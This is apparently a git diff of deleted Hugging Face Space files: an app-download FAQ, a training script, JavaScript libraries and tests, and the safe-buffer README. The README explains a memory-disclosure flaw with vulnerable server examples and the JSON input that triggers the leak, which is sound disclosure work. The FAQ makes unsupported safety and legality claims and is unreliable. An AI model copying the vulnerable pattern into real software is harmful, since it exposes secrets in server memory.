    • A: Yes, download 233 is safe and virus-free. It does not contain any malware or spyware that can harm your device or data.
    • -
    • Q: Is download 233 legal?
    • -
    • A: Yes, download 233 is legal and compliant with the laws and regulations of China and other countries. It does not violate any intellectual property rights or privacy policies of the game developers or publishers.
    • -
    • Q: How does download 233 work?
    • -
    • A: Download 233 works by streaming the game data from the cloud servers to your device in real-time. It does not store any game data on your device or consume any storage space.
    • -
    • Q: What are the requirements to use download 233?
    • -
    • A: To use download 233, you need an Android device with Android version 4.4 or higher and an internet connection (Wi-Fi or mobile data).
    • -

    401be4b1e0
    -
    -
    \ No newline at end of file diff --git a/spaces/fclong/summary/fengshen/examples/zen1_finetune/ner_zen1_ontonotes4.sh b/spaces/fclong/summary/fengshen/examples/zen1_finetune/ner_zen1_ontonotes4.sh deleted file mode 100644 index be51a3f3d709d761b6dcb4e5759cc5b92a09a609..0000000000000000000000000000000000000000 --- a/spaces/fclong/summary/fengshen/examples/zen1_finetune/ner_zen1_ontonotes4.sh +++ /dev/null @@ -1,91 +0,0 @@ -#!/bin/bash -#SBATCH --job-name=zen1_base_ontonotes4 # create a short name for your job -#SBATCH --nodes=1 # node count -#SBATCH --ntasks=1 # total number of tasks across all nodes -#SBATCH --cpus-per-task=30 # cpu-cores per task (>1 if multi-threaded tasks) -#SBATCH --gres=gpu:1 # number of gpus per node -#SBATCH --mail-type=ALL # send email when job begins, ends or failed etc. -#SBATCH -o /cognitive_comp/ganruyi/experiments/ner_finetune/zen1_base_ontonotes4/%x-%j.log # output and error file name (%x=job name, %j=job id) - - -export CUDA_VISIBLE_DEVICES='1' -export TORCH_EXTENSIONS_DIR=/cognitive_comp/ganruyi/tmp/torch_extendsions - -MODEL_NAME=zen1_base - -TASK=ontonotes4 - -ZERO_STAGE=1 -STRATEGY=deepspeed_stage_${ZERO_STAGE} - -ROOT_DIR=/cognitive_comp/ganruyi/experiments/ner_finetune/${MODEL_NAME}_${TASK} -if [ ! -d ${ROOT_DIR} ];then - mkdir -p ${ROOT_DIR} - echo ${ROOT_DIR} created!!!!!!!!!!!!!! -else - echo ${ROOT_DIR} exist!!!!!!!!!!!!!!! -fi - -DATA_DIR=/cognitive_comp/lujunyu/data_zh/NER_Aligned/OntoNotes4/ -PRETRAINED_MODEL_PATH=/cognitive_comp/ganruyi/hf_models/zen/ZEN_pretrain_base_v0.1.0 - -CHECKPOINT_PATH=${ROOT_DIR}/ckpt/ -OUTPUT_PATH=${ROOT_DIR}/predict.json - -DATA_ARGS="\ - --data_dir $DATA_DIR \ - --train_data train.char.bmes \ - --valid_data test.char.bmes \ - --test_data test.char.bmes \ - --train_batchsize 64 \ - --valid_batchsize 16 \ - --max_seq_length 128 \ - --task_name ontonotes4 \ - " - -MODEL_ARGS="\ - --learning_rate 3e-5 \ - --weight_decay 0.1 \ - --warmup_ratio 0.01 \ - --markup bioes \ - --middle_prefix M- \ - " - -MODEL_CHECKPOINT_ARGS="\ - --monitor val_f1 \ - --save_top_k 3 \ - --mode max \ - --every_n_train_steps 200 \ - --save_weights_only True \ - --dirpath $CHECKPOINT_PATH \ - --filename model-{epoch:02d}-{val_f1:.4f} \ - " - -TRAINER_ARGS="\ - --max_epochs 30 \ - --gpus 1 \ - --check_val_every_n_epoch 1 \ - --val_check_interval 200 \ - --default_root_dir $ROOT_DIR \ - " - - -options=" \ - --pretrained_model_path $PRETRAINED_MODEL_PATH \ - --vocab_file $PRETRAINED_MODEL_PATH/vocab.txt \ - --do_lower_case \ - --output_save_path $OUTPUT_PATH \ - $DATA_ARGS \ - $MODEL_ARGS \ - $MODEL_CHECKPOINT_ARGS \ - $TRAINER_ARGS \ -" -SCRIPT_PATH=/cognitive_comp/ganruyi/Fengshenbang-LM/fengshen/examples/zen1_finetune/fengshen_token_level_ft_task.py -/home/ganruyi/anaconda3/bin/python $SCRIPT_PATH $options - -# SINGULARITY_PATH=/cognitive_comp/ganruyi/pytorch21_06_py3_docker_image_v2.sif -# python3 $SCRIPT_PATH $options -# source activate base -# singularity exec --nv -B /cognitive_comp/:/cognitive_comp/ $SINGULARITY_PATH /home/ganruyi/anaconda3/bin/python $SCRIPT_PATH $options -# /home/ganruyi/anaconda3/bin/python $SCRIPT_PATH $options - diff --git a/spaces/fffiloni/Image-to-MusicGen/audiocraft/modules/__init__.py b/spaces/fffiloni/Image-to-MusicGen/audiocraft/modules/__init__.py deleted file mode 100644 index 81ba30f6466ff91b90490a4fb92f7d3d0d00144d..0000000000000000000000000000000000000000 --- a/spaces/fffiloni/Image-to-MusicGen/audiocraft/modules/__init__.py +++ /dev/null @@ -1,20 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -# flake8: noqa -from .conv import ( - NormConv1d, - NormConv2d, - NormConvTranspose1d, - NormConvTranspose2d, - StreamableConv1d, - StreamableConvTranspose1d, - pad_for_conv1d, - pad1d, - unpad1d, -) -from .lstm import StreamableLSTM -from .seanet import SEANetEncoder, SEANetDecoder diff --git a/spaces/fffiloni/controlnet-animation-doodle/node_modules/content-type/index.js b/spaces/fffiloni/controlnet-animation-doodle/node_modules/content-type/index.js deleted file mode 100644 index 41840e7bc3e48cda894597cd18e562a37a174f7c..0000000000000000000000000000000000000000 --- a/spaces/fffiloni/controlnet-animation-doodle/node_modules/content-type/index.js +++ /dev/null @@ -1,225 +0,0 @@ -/*! - * content-type - * Copyright(c) 2015 Douglas Christopher Wilson - * MIT Licensed - */ - -'use strict' - -/** - * RegExp to match *( ";" parameter ) in RFC 7231 sec 3.1.1.1 - * - * parameter = token "=" ( token / quoted-string ) - * token = 1*tchar - * tchar = "!" / "#" / "$" / "%" / "&" / "'" / "*" - * / "+" / "-" / "." / "^" / "_" / "`" / "|" / "~" - * / DIGIT / ALPHA - * ; any VCHAR, except delimiters - * quoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTE - * qdtext = HTAB / SP / %x21 / %x23-5B / %x5D-7E / obs-text - * obs-text = %x80-FF - * quoted-pair = "\" ( HTAB / SP / VCHAR / obs-text ) - */ -var PARAM_REGEXP = /; *([!#$%&'*+.^_`|~0-9A-Za-z-]+) *= *("(?:[\u000b\u0020\u0021\u0023-\u005b\u005d-\u007e\u0080-\u00ff]|\\[\u000b\u0020-\u00ff])*"|[!#$%&'*+.^_`|~0-9A-Za-z-]+) */g // eslint-disable-line no-control-regex -var TEXT_REGEXP = /^[\u000b\u0020-\u007e\u0080-\u00ff]+$/ // eslint-disable-line no-control-regex -var TOKEN_REGEXP = /^[!#$%&'*+.^_`|~0-9A-Za-z-]+$/ - -/** - * RegExp to match quoted-pair in RFC 7230 sec 3.2.6 - * - * quoted-pair = "\" ( HTAB / SP / VCHAR / obs-text ) - * obs-text = %x80-FF - */ -var QESC_REGEXP = /\\([\u000b\u0020-\u00ff])/g // eslint-disable-line no-control-regex - -/** - * RegExp to match chars that must be quoted-pair in RFC 7230 sec 3.2.6 - */ -var QUOTE_REGEXP = /([\\"])/g - -/** - * RegExp to match type in RFC 7231 sec 3.1.1.1 - * - * media-type = type "/" subtype - * type = token - * subtype = token - */ -var TYPE_REGEXP = /^[!#$%&'*+.^_`|~0-9A-Za-z-]+\/[!#$%&'*+.^_`|~0-9A-Za-z-]+$/ - -/** - * Module exports. - * @public - */ - -exports.format = format -exports.parse = parse - -/** - * Format object to media type. - * - * @param {object} obj - * @return {string} - * @public - */ - -function format (obj) { - if (!obj || typeof obj !== 'object') { - throw new TypeError('argument obj is required') - } - - var parameters = obj.parameters - var type = obj.type - - if (!type || !TYPE_REGEXP.test(type)) { - throw new TypeError('invalid type') - } - - var string = type - - // append parameters - if (parameters && typeof parameters === 'object') { - var param - var params = Object.keys(parameters).sort() - - for (var i = 0; i < params.length; i++) { - param = params[i] - - if (!TOKEN_REGEXP.test(param)) { - throw new TypeError('invalid parameter name') - } - - string += '; ' + param + '=' + qstring(parameters[param]) - } - } - - return string -} - -/** - * Parse media type to object. - * - * @param {string|object} string - * @return {Object} - * @public - */ - -function parse (string) { - if (!string) { - throw new TypeError('argument string is required') - } - - // support req/res-like objects as argument - var header = typeof string === 'object' - ? getcontenttype(string) - : string - - if (typeof header !== 'string') { - throw new TypeError('argument string is required to be a string') - } - - var index = header.indexOf(';') - var type = index !== -1 - ? header.slice(0, index).trim() - : header.trim() - - if (!TYPE_REGEXP.test(type)) { - throw new TypeError('invalid media type') - } - - var obj = new ContentType(type.toLowerCase()) - - // parse parameters - if (index !== -1) { - var key - var match - var value - - PARAM_REGEXP.lastIndex = index - - while ((match = PARAM_REGEXP.exec(header))) { - if (match.index !== index) { - throw new TypeError('invalid parameter format') - } - - index += match[0].length - key = match[1].toLowerCase() - value = match[2] - - if (value.charCodeAt(0) === 0x22 /* " */) { - // remove quotes - value = value.slice(1, -1) - - // remove escapes - if (value.indexOf('\\') !== -1) { - value = value.replace(QESC_REGEXP, '$1') - } - } - - obj.parameters[key] = value - } - - if (index !== header.length) { - throw new TypeError('invalid parameter format') - } - } - - return obj -} - -/** - * Get content-type from req/res objects. - * - * @param {object} - * @return {Object} - * @private - */ - -function getcontenttype (obj) { - var header - - if (typeof obj.getHeader === 'function') { - // res-like - header = obj.getHeader('content-type') - } else if (typeof obj.headers === 'object') { - // req-like - header = obj.headers && obj.headers['content-type'] - } - - if (typeof header !== 'string') { - throw new TypeError('content-type header is missing from object') - } - - return header -} - -/** - * Quote a string if necessary. - * - * @param {string} val - * @return {string} - * @private - */ - -function qstring (val) { - var str = String(val) - - // no need to quote tokens - if (TOKEN_REGEXP.test(str)) { - return str - } - - if (str.length > 0 && !TEXT_REGEXP.test(str)) { - throw new TypeError('invalid parameter value') - } - - return '"' + str.replace(QUOTE_REGEXP, '\\$1') + '"' -} - -/** - * Class to represent a content type. - * @private - */ -function ContentType (type) { - this.parameters = Object.create(null) - this.type = type -} diff --git a/spaces/fffiloni/controlnet-animation-doodle/node_modules/object-inspect/test/fn.js b/spaces/fffiloni/controlnet-animation-doodle/node_modules/object-inspect/test/fn.js deleted file mode 100644 index de3ca625e73adcabc8570a11318504d8d6aa6806..0000000000000000000000000000000000000000 --- a/spaces/fffiloni/controlnet-animation-doodle/node_modules/object-inspect/test/fn.js +++ /dev/null @@ -1,76 +0,0 @@ -var inspect = require('../'); -var test = require('tape'); -var arrow = require('make-arrow-function')(); -var functionsHaveConfigurableNames = require('functions-have-names').functionsHaveConfigurableNames(); - -test('function', function (t) { - t.plan(1); - var obj = [1, 2, function f(n) { return n; }, 4]; - t.equal(inspect(obj), '[ 1, 2, [Function: f], 4 ]'); -}); - -test('function name', function (t) { - t.plan(1); - var f = (function () { - return function () {}; - }()); - f.toString = function toStr() { return 'function xxx () {}'; }; - var obj = [1, 2, f, 4]; - t.equal(inspect(obj), '[ 1, 2, [Function (anonymous)] { toString: [Function: toStr] }, 4 ]'); -}); - -test('anon function', function (t) { - var f = (function () { - return function () {}; - }()); - var obj = [1, 2, f, 4]; - t.equal(inspect(obj), '[ 1, 2, [Function (anonymous)], 4 ]'); - - t.end(); -}); - -test('arrow function', { skip: !arrow }, function (t) { - t.equal(inspect(arrow), '[Function (anonymous)]'); - - t.end(); -}); - -test('truly nameless function', { skip: !arrow || !functionsHaveConfigurableNames }, function (t) { - function f() {} - Object.defineProperty(f, 'name', { value: false }); - t.equal(f.name, false); - t.equal( - inspect(f), - '[Function: f]', - 'named function with falsy `.name` does not hide its original name' - ); - - function g() {} - Object.defineProperty(g, 'name', { value: true }); - t.equal(g.name, true); - t.equal( - inspect(g), - '[Function: true]', - 'named function with truthy `.name` hides its original name' - ); - - var anon = function () {}; // eslint-disable-line func-style - Object.defineProperty(anon, 'name', { value: null }); - t.equal(anon.name, null); - t.equal( - inspect(anon), - '[Function (anonymous)]', - 'anon function with falsy `.name` does not hide its anonymity' - ); - - var anon2 = function () {}; // eslint-disable-line func-style - Object.defineProperty(anon2, 'name', { value: 1 }); - t.equal(anon2.name, 1); - t.equal( - inspect(anon2), - '[Function: 1]', - 'anon function with truthy `.name` hides its anonymity' - ); - - t.end(); -}); diff --git a/spaces/fffiloni/controlnet-animation-doodle/node_modules/safe-buffer/README.md b/spaces/fffiloni/controlnet-animation-doodle/node_modules/safe-buffer/README.md deleted file mode 100644 index e9a81afd0406f030ba21169f0c7a1dba70b3a93b..0000000000000000000000000000000000000000 --- a/spaces/fffiloni/controlnet-animation-doodle/node_modules/safe-buffer/README.md +++ /dev/null @@ -1,584 +0,0 @@ -# safe-buffer [![travis][travis-image]][travis-url] [![npm][npm-image]][npm-url] [![downloads][downloads-image]][downloads-url] [![javascript style guide][standard-image]][standard-url] - -[travis-image]: https://img.shields.io/travis/feross/safe-buffer/master.svg -[travis-url]: https://travis-ci.org/feross/safe-buffer -[npm-image]: https://img.shields.io/npm/v/safe-buffer.svg -[npm-url]: https://npmjs.org/package/safe-buffer -[downloads-image]: https://img.shields.io/npm/dm/safe-buffer.svg -[downloads-url]: https://npmjs.org/package/safe-buffer -[standard-image]: https://img.shields.io/badge/code_style-standard-brightgreen.svg -[standard-url]: https://standardjs.com - -#### Safer Node.js Buffer API - -**Use the new Node.js Buffer APIs (`Buffer.from`, `Buffer.alloc`, -`Buffer.allocUnsafe`, `Buffer.allocUnsafeSlow`) in all versions of Node.js.** - -**Uses the built-in implementation when available.** - -## install - -``` -npm install safe-buffer -``` - -## usage - -The goal of this package is to provide a safe replacement for the node.js `Buffer`. - -It's a drop-in replacement for `Buffer`. You can use it by adding one `require` line to -the top of your node.js modules: - -```js -var Buffer = require('safe-buffer').Buffer - -// Existing buffer code will continue to work without issues: - -new Buffer('hey', 'utf8') -new Buffer([1, 2, 3], 'utf8') -new Buffer(obj) -new Buffer(16) // create an uninitialized buffer (potentially unsafe) - -// But you can use these new explicit APIs to make clear what you want: - -Buffer.from('hey', 'utf8') // convert from many types to a Buffer -Buffer.alloc(16) // create a zero-filled buffer (safe) -Buffer.allocUnsafe(16) // create an uninitialized buffer (potentially unsafe) -``` - -## api - -### Class Method: Buffer.from(array) - - -* `array` {Array} - -Allocates a new `Buffer` using an `array` of octets. - -```js -const buf = Buffer.from([0x62,0x75,0x66,0x66,0x65,0x72]); - // creates a new Buffer containing ASCII bytes - // ['b','u','f','f','e','r'] -``` - -A `TypeError` will be thrown if `array` is not an `Array`. - -### Class Method: Buffer.from(arrayBuffer[, byteOffset[, length]]) - - -* `arrayBuffer` {ArrayBuffer} The `.buffer` property of a `TypedArray` or - a `new ArrayBuffer()` -* `byteOffset` {Number} Default: `0` -* `length` {Number} Default: `arrayBuffer.length - byteOffset` - -When passed a reference to the `.buffer` property of a `TypedArray` instance, -the newly created `Buffer` will share the same allocated memory as the -TypedArray. - -```js -const arr = new Uint16Array(2); -arr[0] = 5000; -arr[1] = 4000; - -const buf = Buffer.from(arr.buffer); // shares the memory with arr; - -console.log(buf); - // Prints: - -// changing the TypedArray changes the Buffer also -arr[1] = 6000; - -console.log(buf); - // Prints: -``` - -The optional `byteOffset` and `length` arguments specify a memory range within -the `arrayBuffer` that will be shared by the `Buffer`. - -```js -const ab = new ArrayBuffer(10); -const buf = Buffer.from(ab, 0, 2); -console.log(buf.length); - // Prints: 2 -``` - -A `TypeError` will be thrown if `arrayBuffer` is not an `ArrayBuffer`. - -### Class Method: Buffer.from(buffer) - - -* `buffer` {Buffer} - -Copies the passed `buffer` data onto a new `Buffer` instance. - -```js -const buf1 = Buffer.from('buffer'); -const buf2 = Buffer.from(buf1); - -buf1[0] = 0x61; -console.log(buf1.toString()); - // 'auffer' -console.log(buf2.toString()); - // 'buffer' (copy is not changed) -``` - -A `TypeError` will be thrown if `buffer` is not a `Buffer`. - -### Class Method: Buffer.from(str[, encoding]) - - -* `str` {String} String to encode. -* `encoding` {String} Encoding to use, Default: `'utf8'` - -Creates a new `Buffer` containing the given JavaScript string `str`. If -provided, the `encoding` parameter identifies the character encoding. -If not provided, `encoding` defaults to `'utf8'`. - -```js -const buf1 = Buffer.from('this is a tést'); -console.log(buf1.toString()); - // prints: this is a tést -console.log(buf1.toString('ascii')); - // prints: this is a tC)st - -const buf2 = Buffer.from('7468697320697320612074c3a97374', 'hex'); -console.log(buf2.toString()); - // prints: this is a tést -``` - -A `TypeError` will be thrown if `str` is not a string. - -### Class Method: Buffer.alloc(size[, fill[, encoding]]) - - -* `size` {Number} -* `fill` {Value} Default: `undefined` -* `encoding` {String} Default: `utf8` - -Allocates a new `Buffer` of `size` bytes. If `fill` is `undefined`, the -`Buffer` will be *zero-filled*. - -```js -const buf = Buffer.alloc(5); -console.log(buf); - // -``` - -The `size` must be less than or equal to the value of -`require('buffer').kMaxLength` (on 64-bit architectures, `kMaxLength` is -`(2^31)-1`). Otherwise, a [`RangeError`][] is thrown. A zero-length Buffer will -be created if a `size` less than or equal to 0 is specified. - -If `fill` is specified, the allocated `Buffer` will be initialized by calling -`buf.fill(fill)`. See [`buf.fill()`][] for more information. - -```js -const buf = Buffer.alloc(5, 'a'); -console.log(buf); - // -``` - -If both `fill` and `encoding` are specified, the allocated `Buffer` will be -initialized by calling `buf.fill(fill, encoding)`. For example: - -```js -const buf = Buffer.alloc(11, 'aGVsbG8gd29ybGQ=', 'base64'); -console.log(buf); - // -``` - -Calling `Buffer.alloc(size)` can be significantly slower than the alternative -`Buffer.allocUnsafe(size)` but ensures that the newly created `Buffer` instance -contents will *never contain sensitive data*. - -A `TypeError` will be thrown if `size` is not a number. - -### Class Method: Buffer.allocUnsafe(size) - - -* `size` {Number} - -Allocates a new *non-zero-filled* `Buffer` of `size` bytes. The `size` must -be less than or equal to the value of `require('buffer').kMaxLength` (on 64-bit -architectures, `kMaxLength` is `(2^31)-1`). Otherwise, a [`RangeError`][] is -thrown. A zero-length Buffer will be created if a `size` less than or equal to -0 is specified. - -The underlying memory for `Buffer` instances created in this way is *not -initialized*. The contents of the newly created `Buffer` are unknown and -*may contain sensitive data*. Use [`buf.fill(0)`][] to initialize such -`Buffer` instances to zeroes. - -```js -const buf = Buffer.allocUnsafe(5); -console.log(buf); - // - // (octets will be different, every time) -buf.fill(0); -console.log(buf); - // -``` - -A `TypeError` will be thrown if `size` is not a number. - -Note that the `Buffer` module pre-allocates an internal `Buffer` instance of -size `Buffer.poolSize` that is used as a pool for the fast allocation of new -`Buffer` instances created using `Buffer.allocUnsafe(size)` (and the deprecated -`new Buffer(size)` constructor) only when `size` is less than or equal to -`Buffer.poolSize >> 1` (floor of `Buffer.poolSize` divided by two). The default -value of `Buffer.poolSize` is `8192` but can be modified. - -Use of this pre-allocated internal memory pool is a key difference between -calling `Buffer.alloc(size, fill)` vs. `Buffer.allocUnsafe(size).fill(fill)`. -Specifically, `Buffer.alloc(size, fill)` will *never* use the internal Buffer -pool, while `Buffer.allocUnsafe(size).fill(fill)` *will* use the internal -Buffer pool if `size` is less than or equal to half `Buffer.poolSize`. The -difference is subtle but can be important when an application requires the -additional performance that `Buffer.allocUnsafe(size)` provides. - -### Class Method: Buffer.allocUnsafeSlow(size) - - -* `size` {Number} - -Allocates a new *non-zero-filled* and non-pooled `Buffer` of `size` bytes. The -`size` must be less than or equal to the value of -`require('buffer').kMaxLength` (on 64-bit architectures, `kMaxLength` is -`(2^31)-1`). Otherwise, a [`RangeError`][] is thrown. A zero-length Buffer will -be created if a `size` less than or equal to 0 is specified. - -The underlying memory for `Buffer` instances created in this way is *not -initialized*. The contents of the newly created `Buffer` are unknown and -*may contain sensitive data*. Use [`buf.fill(0)`][] to initialize such -`Buffer` instances to zeroes. - -When using `Buffer.allocUnsafe()` to allocate new `Buffer` instances, -allocations under 4KB are, by default, sliced from a single pre-allocated -`Buffer`. This allows applications to avoid the garbage collection overhead of -creating many individually allocated Buffers. This approach improves both -performance and memory usage by eliminating the need to track and cleanup as -many `Persistent` objects. - -However, in the case where a developer may need to retain a small chunk of -memory from a pool for an indeterminate amount of time, it may be appropriate -to create an un-pooled Buffer instance using `Buffer.allocUnsafeSlow()` then -copy out the relevant bits. - -```js -// need to keep around a few small chunks of memory -const store = []; - -socket.on('readable', () => { - const data = socket.read(); - // allocate for retained data - const sb = Buffer.allocUnsafeSlow(10); - // copy the data into the new allocation - data.copy(sb, 0, 0, 10); - store.push(sb); -}); -``` - -Use of `Buffer.allocUnsafeSlow()` should be used only as a last resort *after* -a developer has observed undue memory retention in their applications. - -A `TypeError` will be thrown if `size` is not a number. - -### All the Rest - -The rest of the `Buffer` API is exactly the same as in node.js. -[See the docs](https://nodejs.org/api/buffer.html). - - -## Related links - -- [Node.js issue: Buffer(number) is unsafe](https://github.com/nodejs/node/issues/4660) -- [Node.js Enhancement Proposal: Buffer.from/Buffer.alloc/Buffer.zalloc/Buffer() soft-deprecate](https://github.com/nodejs/node-eps/pull/4) - -## Why is `Buffer` unsafe? - -Today, the node.js `Buffer` constructor is overloaded to handle many different argument -types like `String`, `Array`, `Object`, `TypedArrayView` (`Uint8Array`, etc.), -`ArrayBuffer`, and also `Number`. - -The API is optimized for convenience: you can throw any type at it, and it will try to do -what you want. - -Because the Buffer constructor is so powerful, you often see code like this: - -```js -// Convert UTF-8 strings to hex -function toHex (str) { - return new Buffer(str).toString('hex') -} -``` - -***But what happens if `toHex` is called with a `Number` argument?*** - -### Remote Memory Disclosure - -If an attacker can make your program call the `Buffer` constructor with a `Number` -argument, then they can make it allocate uninitialized memory from the node.js process. -This could potentially disclose TLS private keys, user data, or database passwords. - -When the `Buffer` constructor is passed a `Number` argument, it returns an -**UNINITIALIZED** block of memory of the specified `size`. When you create a `Buffer` like -this, you **MUST** overwrite the contents before returning it to the user. - -From the [node.js docs](https://nodejs.org/api/buffer.html#buffer_new_buffer_size): - -> `new Buffer(size)` -> -> - `size` Number -> -> The underlying memory for `Buffer` instances created in this way is not initialized. -> **The contents of a newly created `Buffer` are unknown and could contain sensitive -> data.** Use `buf.fill(0)` to initialize a Buffer to zeroes. - -(Emphasis our own.) - -Whenever the programmer intended to create an uninitialized `Buffer` you often see code -like this: - -```js -var buf = new Buffer(16) - -// Immediately overwrite the uninitialized buffer with data from another buffer -for (var i = 0; i < buf.length; i++) { - buf[i] = otherBuf[i] -} -``` - - -### Would this ever be a problem in real code? - -Yes. It's surprisingly common to forget to check the type of your variables in a -dynamically-typed language like JavaScript. - -Usually the consequences of assuming the wrong type is that your program crashes with an -uncaught exception. But the failure mode for forgetting to check the type of arguments to -the `Buffer` constructor is more catastrophic. - -Here's an example of a vulnerable service that takes a JSON payload and converts it to -hex: - -```js -// Take a JSON payload {str: "some string"} and convert it to hex -var server = http.createServer(function (req, res) { - var data = '' - req.setEncoding('utf8') - req.on('data', function (chunk) { - data += chunk - }) - req.on('end', function () { - var body = JSON.parse(data) - res.end(new Buffer(body.str).toString('hex')) - }) -}) - -server.listen(8080) -``` - -In this example, an http client just has to send: - -```json -{ - "str": 1000 -} -``` - -and it will get back 1,000 bytes of uninitialized memory from the server. - -This is a very serious bug. It's similar in severity to the -[the Heartbleed bug](http://heartbleed.com/) that allowed disclosure of OpenSSL process -memory by remote attackers. - - -### Which real-world packages were vulnerable? - -#### [`bittorrent-dht`](https://www.npmjs.com/package/bittorrent-dht) - -[Mathias Buus](https://github.com/mafintosh) and I -([Feross Aboukhadijeh](http://feross.org/)) found this issue in one of our own packages, -[`bittorrent-dht`](https://www.npmjs.com/package/bittorrent-dht). The bug would allow -anyone on the internet to send a series of messages to a user of `bittorrent-dht` and get -them to reveal 20 bytes at a time of uninitialized memory from the node.js process. - -Here's -[the commit](https://github.com/feross/bittorrent-dht/commit/6c7da04025d5633699800a99ec3fbadf70ad35b8) -that fixed it. We released a new fixed version, created a -[Node Security Project disclosure](https://nodesecurity.io/advisories/68), and deprecated all -vulnerable versions on npm so users will get a warning to upgrade to a newer version. - -#### [`ws`](https://www.npmjs.com/package/ws) - -That got us wondering if there were other vulnerable packages. Sure enough, within a short -period of time, we found the same issue in [`ws`](https://www.npmjs.com/package/ws), the -most popular WebSocket implementation in node.js. - -If certain APIs were called with `Number` parameters instead of `String` or `Buffer` as -expected, then uninitialized server memory would be disclosed to the remote peer. - -These were the vulnerable methods: - -```js -socket.send(number) -socket.ping(number) -socket.pong(number) -``` - -Here's a vulnerable socket server with some echo functionality: - -```js -server.on('connection', function (socket) { - socket.on('message', function (message) { - message = JSON.parse(message) - if (message.type === 'echo') { - socket.send(message.data) // send back the user's message - } - }) -}) -``` - -`socket.send(number)` called on the server, will disclose server memory. - -Here's [the release](https://github.com/websockets/ws/releases/tag/1.0.1) where the issue -was fixed, with a more detailed explanation. Props to -[Arnout Kazemier](https://github.com/3rd-Eden) for the quick fix. Here's the -[Node Security Project disclosure](https://nodesecurity.io/advisories/67). - - -### What's the solution? - -It's important that node.js offers a fast way to get memory otherwise performance-critical -applications would needlessly get a lot slower. - -But we need a better way to *signal our intent* as programmers. **When we want -uninitialized memory, we should request it explicitly.** - -Sensitive functionality should not be packed into a developer-friendly API that loosely -accepts many different types. This type of API encourages the lazy practice of passing -variables in without checking the type very carefully. - -#### A new API: `Buffer.allocUnsafe(number)` - -The functionality of creating buffers with uninitialized memory should be part of another -API. We propose `Buffer.allocUnsafe(number)`. This way, it's not part of an API that -frequently gets user input of all sorts of different types passed into it. - -```js -var buf = Buffer.allocUnsafe(16) // careful, uninitialized memory! - -// Immediately overwrite the uninitialized buffer with data from another buffer -for (var i = 0; i < buf.length; i++) { - buf[i] = otherBuf[i] -} -``` - - -### How do we fix node.js core? - -We sent [a PR to node.js core](https://github.com/nodejs/node/pull/4514) (merged as -`semver-major`) which defends against one case: - -```js -var str = 16 -new Buffer(str, 'utf8') -``` - -In this situation, it's implied that the programmer intended the first argument to be a -string, since they passed an encoding as a second argument. Today, node.js will allocate -uninitialized memory in the case of `new Buffer(number, encoding)`, which is probably not -what the programmer intended. - -But this is only a partial solution, since if the programmer does `new Buffer(variable)` -(without an `encoding` parameter) there's no way to know what they intended. If `variable` -is sometimes a number, then uninitialized memory will sometimes be returned. - -### What's the real long-term fix? - -We could deprecate and remove `new Buffer(number)` and use `Buffer.allocUnsafe(number)` when -we need uninitialized memory. But that would break 1000s of packages. - -~~We believe the best solution is to:~~ - -~~1. Change `new Buffer(number)` to return safe, zeroed-out memory~~ - -~~2. Create a new API for creating uninitialized Buffers. We propose: `Buffer.allocUnsafe(number)`~~ - -#### Update - -We now support adding three new APIs: - -- `Buffer.from(value)` - convert from any type to a buffer -- `Buffer.alloc(size)` - create a zero-filled buffer -- `Buffer.allocUnsafe(size)` - create an uninitialized buffer with given size - -This solves the core problem that affected `ws` and `bittorrent-dht` which is -`Buffer(variable)` getting tricked into taking a number argument. - -This way, existing code continues working and the impact on the npm ecosystem will be -minimal. Over time, npm maintainers can migrate performance-critical code to use -`Buffer.allocUnsafe(number)` instead of `new Buffer(number)`. - - -### Conclusion - -We think there's a serious design issue with the `Buffer` API as it exists today. It -promotes insecure software by putting high-risk functionality into a convenient API -with friendly "developer ergonomics". - -This wasn't merely a theoretical exercise because we found the issue in some of the -most popular npm packages. - -Fortunately, there's an easy fix that can be applied today. Use `safe-buffer` in place of -`buffer`. - -```js -var Buffer = require('safe-buffer').Buffer -``` - -Eventually, we hope that node.js core can switch to this new, safer behavior. We believe -the impact on the ecosystem would be minimal since it's not a breaking change. -Well-maintained, popular packages would be updated to use `Buffer.alloc` quickly, while -older, insecure packages would magically become safe from this attack vector. - - -## links - -- [Node.js PR: buffer: throw if both length and enc are passed](https://github.com/nodejs/node/pull/4514) -- [Node Security Project disclosure for `ws`](https://nodesecurity.io/advisories/67) -- [Node Security Project disclosure for`bittorrent-dht`](https://nodesecurity.io/advisories/68) - - -## credit - -The original issues in `bittorrent-dht` -([disclosure](https://nodesecurity.io/advisories/68)) and -`ws` ([disclosure](https://nodesecurity.io/advisories/67)) were discovered by -[Mathias Buus](https://github.com/mafintosh) and -[Feross Aboukhadijeh](http://feross.org/). - -Thanks to [Adam Baldwin](https://github.com/evilpacket) for helping disclose these issues -and for his work running the [Node Security Project](https://nodesecurity.io/). - -Thanks to [John Hiesey](https://github.com/jhiesey) for proofreading this README and -auditing the code. - - -## license - -MIT. Copyright (C) [Feross Aboukhadijeh](http://feross.org) diff --git a/spaces/fffiloni/video2mmpose/examples/readme.md b/spaces/fffiloni/video2mmpose/examples/readme.md deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/fkhuggingme/gpt-academic/request_llm/bridge_all.py b/spaces/fkhuggingme/gpt-academic/request_llm/bridge_all.py deleted file mode 100644 index fddc9a756f062b68610737123ea39b6a83698a42..0000000000000000000000000000000000000000 --- a/spaces/fkhuggingme/gpt-academic/request_llm/bridge_all.py +++ /dev/null @@ -1,240 +0,0 @@ - -""" - 该文件中主要包含2个函数,是所有LLM的通用接口,它们会继续向下调用更底层的LLM模型,处理多模型并行等细节 - - 不具备多线程能力的函数:正常对话时使用,具备完备的交互功能,不可多线程 - 1. predict(...) - - 具备多线程调用能力的函数:在函数插件中被调用,灵活而简洁 - 2. predict_no_ui_long_connection(...) -""" -import tiktoken -from functools import lru_cache -from concurrent.futures import ThreadPoolExecutor -from toolbox import get_conf, trimmed_format_exc - -from .bridge_chatgpt import predict_no_ui_long_connection as chatgpt_noui -from .bridge_chatgpt import predict as chatgpt_ui - -from .bridge_chatglm import predict_no_ui_long_connection as chatglm_noui -from .bridge_chatglm import predict as chatglm_ui - -from .bridge_newbing import predict_no_ui_long_connection as newbing_noui -from .bridge_newbing import predict as newbing_ui - -# from .bridge_tgui import predict_no_ui_long_connection as tgui_noui -# from .bridge_tgui import predict as tgui_ui - -colors = ['#FF00FF', '#00FFFF', '#FF0000', '#990099', '#009999', '#990044'] - -class 